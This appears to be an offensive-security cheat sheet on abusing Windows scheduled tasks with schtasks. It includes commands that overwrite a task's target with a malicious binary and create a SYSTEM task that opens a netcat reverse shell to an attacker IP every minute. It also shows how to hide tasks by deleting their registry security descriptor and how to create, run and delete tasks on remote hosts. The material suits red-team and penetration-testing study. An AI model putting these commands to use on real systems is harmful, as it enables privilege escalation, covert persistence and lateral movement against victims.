Use the built-in schtasks command to create and manipulate Windows tasks (basically the equivalent of *NIX cron jobs).
# List scheduled tasks#schtasks# View details about a scheduled task#schtasks /query /tn $TASK_NAME /fo list /v# Check the permissions of an executable#icacls $PATH_TO_BINARY# Modify the permissions (if possible/desired)#icacls $PATH_TO_BINARY /grant $GROUP:$PERMISSION# You can overwrite files in Windows in the same way you'd do# in Linux (however, this can cause issues with line# endings... probably best to just use notepad.exe here# instead)#echo $MALICIOUS_BINARY_AND_ARGUMENTS > $PATH_TO_BAT_TO_OVERWRITE# Force a task to run (iff the current user has permission to# do so)#schtasks /run /tn $TASK_NAME
If a task points to a file that you’ve obtained write access to, then that file can be altered without changing the underlying task.
It may also be possible to create your own tasks.
# Creates a task that executes a netcat reverse shell back to# the attacker. "/sc" and "/mo" indicate that the task should# be run every minute. "/ru" indicates that the task will run# with SYSTEM privileges.#schtasks /create /sc minute /mo 1 /tn $TASK_NAME ` /tr "$NETCAT_PATH -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" ` /ru SYSTEM# Checks to see if the task was created successfully.#schtasks /query /tn $TASK_NAME
Stealthy tasks
How to hide Windows tasks using PsExec
Deleting the task Security Descriptor will make the task invisible to any user in the system. Note that this requires PsExec!
Use PsExec64.exe -s -i regedit to open regedit with SYSTEM privileges.
Search in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ for the task to hide. Under the key for that task, there will be a value named SD that contains the security descriptor. Simply delete it.
By default, UAC restricts remote schtasks calls to domain admins and the default local “Administrator” account. Local Windows admins cannot call this service remotely without first disabling UAC!
The schtasks command can also be used to create and manipulate services on remote machines. This uses the Windows RPC (TCP 135), but will fall back to named pipes over SMB (TCP 445) or NetBIOS (TCP 139). (In fact, this is how schtasks works locally as well; the only difference is that in this case a local named pipe is always used.)
# Create $ATTACKER_TASK on the $TARGET_HOST. Note that /sd# (start date) and /st (start time) don't matter if we're# invoking the task manually, as we do next.#schtasks /s $TARGET_HOST /RU "SYSTEM" /create ` /tn "$ATTACKER_TASK" /tr "$SOME_COMMAND" /sc ONCE ` /sd 06/25/2023 /st 16:10# Invoke $ATTACKER_TASK.#schtasks /s $TARGET_HOST /run /TN "$ATTACKER_TASK"# Clean up after yourself.#schtasks /S $TARGET_HOST /TN "$ATTACKER_TASK" /DELETE /F